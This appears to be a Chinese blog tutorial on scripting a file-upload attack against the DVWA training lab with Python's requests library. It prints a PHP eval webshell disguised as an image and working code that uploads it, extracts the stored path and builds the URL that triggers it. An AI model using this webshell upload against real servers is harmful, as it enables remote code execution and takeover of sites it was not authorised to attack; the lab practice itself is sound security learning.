requests模拟文件上传

已于 2023-12-14 12:52:47 修改
阅读量273 收藏 1
点赞数 4
分类专栏: # Ptyhon安全开发 文章标签: python 开发语言
于 2023-09-20 18:02:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhaoSong_/article/details/133092012
版权

DVWA靶场的文件上传关卡,初级

先上传文件,使用BurpSuite抓取数据包

image-20230920170145559

POST请求的数据包发送到Repeater模块

分析使用Python的requests模块发送请求需要携带哪些参数

也可以打开F12,点击Network查看需要携带哪些请求体参数

image-20230920170446495

image-20230920170533509

image-20230920170700134

image-20230920170803298

请求头:

"Cookie":"security=low; PHPSESSID=pgarrj6q61t1sg59mdr6bcbss1"

请求体:

"MAX_FILE_SIZE": "100000"
"uploaded": "(binary)"
"Upload": "Upload"

上传的文件数据可以在BurpSuite抓取到的数据包中查看

image-20230920171052155

发现请求体中的uploaded参数的值 "(binary)"里面的二进制数据就应该是BurpSuite中的文件名,文件内容,文件类型

文件内容:

"uploaded":('1.php','<?php @eval($_REQUEST[6868]);phpinfo();?>','image/png')

上传的文件需要在requests.postfiles参数里

实现代码:

import requests
from bs4 import BeautifulSoup

url = 'http://192.168.8.3/DVWA-2.0.1/vulnerabilities/upload/'

headers = {
    "User-Agent": "",
    "Cookie": "security=low; PHPSESSID=pgarrj6q61t1sg59mdr6bcbss1"
}
data = {
    "MAX_FILE_SIZE": "100000",
    "Upload": "Upload"
}

files = {
    "uploaded": ('2.php', '<?php @eval($_REQUEST[6868]);phpinfo();?>', 'image/png')
}
response = requests.post(url=url, headers=headers, data=data, files=files)

# 提取上传路径
soup = BeautifulSoup(response.text, 'lxml')
#提取pre标签的文件
pre_content=soup.find_all('pre')[0].text   #../../hackable/uploads/2.php succesfully uploaded!
img_path=pre_content.split(' ')[0]  #以空格为分割符,去左边第一个,也就是下标为0的
# print(img_path)                     #../../hackable/uploads/2.php
'''路径拼接'''
img_path=url+img_path
print(img_path)  #http://192.168.8.3/DVWA-2.0.1/vulnerabilities/upload/../../hackable/uploads/2.php

文件上传成功!

image-20230920173552668

得到上传路径!

image-20230920172902342

访问链接,触发php探针

image-20230920172735825

过期的秋刀鱼-
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
模拟文件上传(一):手动文件上传
五彩世界的博客
05-12 1232
关于上传文件,首先我的第一个案例是一个文本文件的上传,简单容易上手!首先我们上传文件肯定就属于实体内容部分了;所以不能过GET方式请求了,要通过POST方式请求;因为:1.get方式是URL传值,URL长度是有限的,很短,并且实体内容只能通过POST传递;因为只有POST方式才有content-type属性。2.因为是实体内容,所以不能通过getParameter这么草率没脑子的步骤去得到上传文件...
模拟图片上传
weixin_51009910的博客
07-18 147
模拟图片上传
umi-request:使用formData格式上传二进制binary文件流
最新发布
羽墨灵丘的博客
04-15 432
umi-request 使用formData格式上传二进制binary文件流
模拟文件上传
qq_44633875的博客
04-26 74
文件上传 服务器端 package Tcp; import java.io.*; import java.net.ServerSocket; import java.net.Socket; import java.nio.charset.StandardCharsets; public class TcpServerDemo02 { public static void main(String[] args) throws IOException { //1.创建服务
Java控制台模拟用户上传文件
qq_69325307的博客
08-03 110
【代码】Java控制台模拟用户上传文件。
Python基于requests实现模拟上传文件
09-17
主要介绍了Python基于requests实现模拟上传文件,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下
利用Python模拟登录pastebin.com的实现方法
09-19
主要介绍了利用Python模拟登录pastebin.com的实现方法,本文图文并茂给大家介绍的非常详细,具有一定的参考借鉴价值 ,需要的朋友可以参考下
Python3网络爬虫中的requests高级用法详解
12-25
本节我们再来了解下 Requests 的一些高级用法,如文件上传,代理设置,Cookies 设置等等。 1. 文件上传 我们知道 Reqeuests 可以模拟提交一些数据,假如有的网站需要我们上传文件,我们同样可以利用它来上传,实现...
微信小程序服务端接口,支持普通Http请求、上传文件、长连接。.zip
03-10
遵守规则: 为避免对网站造成过大负担或触发反爬虫机制,爬虫需要遵守网站的robots.txt协议,限制访问频率和深度,并模拟人类访问行为,如设置User-Agent。 反爬虫应对: 由于爬虫的存在,一些网站采取了反爬虫措施...
phpCurl请求工具,可模拟表单、上传文件
03-10
通用的http请求工具,可以模拟表单提交、上传文件、发送请求、获取网页内容
java处理文件上传的底层实现以及java模拟post协议实现文件上传
07-27
使用java处理文件上传的底层实现流程以及java模拟post协议实现文件上传
请求数据之文件上传
security_linsho的博客
05-04 430
文件上传的三要素 1 表单项type=“file” 2表单的提交方式是post 3 文件上传的具体代码实现过程: 准备过程:首先我们先创建一个jsp文件: 记住文件上传的重点:方法必须是post,提交的时候必须是多部分表单。 第一步:导入fileupload和io坐标 <dependency> <groupId>commons-fileupload</groupId> <artifactId&g.
Web安全—文件上传漏洞HTTP数据包分析
weixin_44431280的博客
03-02 1840
文件上传过程: 客户端与服务端建立TCP连接后,客户端发起HTTP协议发送文件至服务端,文件传输通常使用POST请求文件上传HTTP协议字段解析 HTTP请求头部: 1,Content-Type:multipart/form-data 代表这是一个文件上传的HTTP请求 2,boundary:分隔符,用来区分POST数据,boundary中的值代表的是POST数据的开头,最后标识结束的boundary值尾部默认会多出两个-- 3,Content-Length:上传的文件大小 HTTP请求主体: 1,
【Spring mvc】处理文件上传请求
weixin_46005032的博客
11-14 643
仅为本人学习时查阅所用,仅供参考。
python代码requsets模块post的files参数详解
m0_62410190的博客
05-03 1348
文件元组(例如 ('file.txt', open('file.txt', 'rb'), 'text/plain'))。文件列表(例如 [('file1.txt', open('file1.txt', 'rb')), ('file2.txt', open('file2.txt', 'rb'))])。然后,使用 open() 方法打开文件,并将文件对象放在 files 参数中,键为 file,值为文件对象。文件对象(例如 open('file.txt', 'rb'))。# 定义 API 地址和文件路径。
python数据的获取与处理
Maple__Boy
08-10 1250
数据的获取与处理 写在前面:本文从北京公交路线数据的获取和预处理入手,记录使用pythonrequests库获取数据,pandas库预处理数据的过程。文章在保证按照一定处理逻辑的前提下,以自问自答的方式,对其中每一个环节进行详细阐述。本次代码均在jupyter notebook中测试通过,希望对大家有所启示。 数据获取: 本次我们从公交网获取北京公交的数据。 (http://beijing.gongjiao.com/lines_all.html) 如上图所示,数据获取分为请求,解析,存储三个最主要的步骤
python简单实现文件上传/下载
热门推荐
Antrn
11-24 1万+
如果团队想要共享一个文件夹,可以在服务器上共享文件夹,支持文件上传和下载。 本文主要介绍两种方式。 方法一 本方法主要使用python的http.server和droopy模块实现共享文件夹和文件上传。不用自己写代码,都有现成的,适合我这种懒人。 共享文件夹 两个版本的命令: python2: python -m SimpleHTTPServer 1234 python3: python3 -m http.server 1234 后面数字是自定义端口,1234确保在服务器的控制台打开安全组 后台运行 为
使用python编写简单的文件上传exp
CC210231的博客
04-02 2078
最近开始学习使用python进行exp的编写,毕竟python的功底也不太好,期间遇到了许多问题,下面,就记录一下编写文件上传exp的过程,希望对需要的人有帮助! 首先,我使用的是pikachu靶场的的文件上传的第一个模块来练习 创建一个简单地一句话木马,将文件后缀改为jpg(由于这一关是前端白名单验证,我们能通过抓包修改文件后缀绕过;也可以直接用exp绕过,因为requests请求不经过前端,也就是不进行客户端验证,直接在请求数据中用php后缀就行;但这里我们要分析数据包,得进行正常的上传流
python 文件上传
09-21
第三种方法是使用requests模拟在Postman中使用form-data上传文件的过程。该过程首先使用you-get根据存储的第三方视频链接将视频下载下来,然后使用upload方法将视频上传至oss,获取oss链接后更新到对应的数据库中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值